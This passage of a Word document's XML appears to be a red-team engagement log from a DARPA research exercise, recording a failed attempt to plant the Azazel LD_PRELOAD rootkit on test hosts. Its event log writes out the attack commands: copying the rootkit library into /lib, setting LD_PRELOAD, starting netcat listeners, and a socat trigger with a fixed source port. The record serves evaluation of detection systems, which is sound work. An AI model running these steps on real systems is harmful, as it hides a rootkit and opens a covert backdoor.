          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>clearscope: andrew</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A377FF" w14:textId="537A0341" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="_kcvdrpmwgmam" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="199" w:name="_Toc12600111"/>
      <w:bookmarkEnd w:id="198"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>09:05 -- TRACE 1 and 2 – Azazel APT (Failed)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w14:paraId="0CCFCC0C" w14:textId="442DA57B" w:rsidR="005A0BE6" w:rsidRPr="00FC027E" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The first of this day’s attacks were against TA1 TRACE.  Both TRACE 1 and TRACE 2 were attacked using Azazel, which is an open source rootkit.  It uses a well-known technique to inject itself via the LD_PRELOAD environment variable into newly launched applications.  As the first library loaded when an application is launched, it’s able to hook existing functions in common libraries to hide itself.  The assumption is that we have stolen credentials and are going to use them to establish an ssh connection.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787071EF" w14:textId="071FEB76" w:rsidR="005A0BE6" w:rsidRPr="00FC027E" w:rsidRDefault="005A0BE6" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Azazel APT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">was run </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>without testing as it worked without issue in Engagement 4; however, despite many attempts on the TRACE hosts, we were unable to get Azazel to run and connect out for C2.  We would consider all of this activity benign as no C2 connection ever happened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586819B6" w14:textId="7EC328A8" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_ln7tybdpzhn3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="201" w:name="_Toc12600112"/>
      <w:bookmarkEnd w:id="200"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w14:paraId="2CAF3B54" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-trace-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.118</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Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983C1AF" w14:textId="4F423615" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="_58463msh9h14" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="203" w:name="_Toc12600113"/>
      <w:bookmarkEnd w:id="202"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w14:paraId="2EAA2AF2"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Azazel APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A90F5E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="204" w:name="_Toc12600114"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w14:paraId="3636CC14" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3FEC56" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ scp libselinux.so admin@128.55.12.118:./work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025A8D9E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.118's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F788F0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>scp: ./work/libselinux.so: Permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414D5547" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ scp libselinux.so admin@128.55.12.118:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD5976" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.118's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EDE773" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">libselinux.so                                                                                                                                       100%   31KB  30.7KB/s   00:00  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD4E99D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061306C7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F7B27F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ ssh admin@128.55.12.118</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13878071" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.118's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50571B68" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C35300" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38540842" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD9CFA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0BE3DD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System information as of Fri May 17 09:08:15 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C313BE0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D2C8C2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System load: 4.55               Memory usage: 68%   Processes:       260</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6C7FC9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Usage of /:  8.0% of 885.13GB   Swap usage:   3%    Users logged in: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F1C88" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A6776E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B40919F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771F78B8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6723B5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Your Hardware Enablement Stack (HWE) is supported until April 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D189C8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Last login: Fri May 17 09:08:16 2019 from 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F8BE2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C628DA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:09</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151A258A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271ED9A7" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>aeroides  corporales  Downloads  glx_alsa_675.ko  hsperfdata_darpa  insalivation  libselinux.so   minion        out10   out514  out724  out888  Pictures      test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6590B02F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>backup    Desktop     files      grains           hyporhined        jna-95354950  load_helper.ko  Music         out20   out559  out850  out892  Public        Videos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3F714" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bogued    docs        footstool  heightener       ichthyodian       juliet        lushes          mytest        out249  out669  out857  out912  read_scan.ko  work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEAABB5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>chored    Documents   gagtooth   hosts            infragrant        knaps         maremmese       nodeexporter  out250  out680  out864  passwd  Templates     xvnc4viewer.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA18E5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ sudo mv libselinux.so /lib/libselinux.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F29D060" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="522BBBC8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CFB761" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ export LD_PRELOAD=/lib/libselinux.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BAE845" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ sudo nc -k -l 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6D656D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D8CF95" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A03775" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ socat -,raw,echo=0 TCP:128.55.12.118:443,bind=61040</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527C6369" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FEA02B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>(just normal netcat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53501D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36352EBE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>^Cadmin@ta1-trace-2:~$ nc -k -l 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314F106E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nc: Permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41362AE5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:~$ nc -k -l 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56187259" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E7B466" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@ta51-bg-gen:~$ socat -,raw,echo=0 TCP:128.55.12.118:8080,bind=61040 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E006E65" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>(just netcat again?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197DB28" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BF5C6D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D49CC11" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:/lib$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5326756D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>apparmor  firmware  klibc-gLiulUM5C1Zpwc25rCxX8UZ6S-s.so  libip6tc.so.0.1.0  libxtables.so.10      modprobe.d      recovery-mode  udev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0573BADB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>brltty    hdparm    libip4tc.so.0                         libiptc.so.0       libxtables.so.10.0.0  modules         resolvconf     ufw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D41862" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>cpp       ifupdown  libip4tc.so.0.1.0                     libiptc.so.0.0.0   linux-sound-base      modules-load.d  systemd        x86_64-linux-gnu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB8439D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>crda      init      libip6tc.so.0                         libselinux.so      lsb                   plymouth        terminfo       xtables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A06B9F9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F195A6C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>09:19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAEE0B1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta1-trace-2:/lib$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EE98BA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6965FAC6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Connection to 128.55.12.118 closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08526AA8" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-bg-gen:~$ ssh admin@128.55.12.118</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD251A6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">admin@128.55.12.118's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B932400" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D8CD8C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66523A84" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9BBECE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F3D169" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System information as of Fri May 17 09:18:01 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B56443" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD4443D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  System load: 2.8                Memory usage: 65%   Processes:       260</w:t>
      </w:r>
    </w:p>
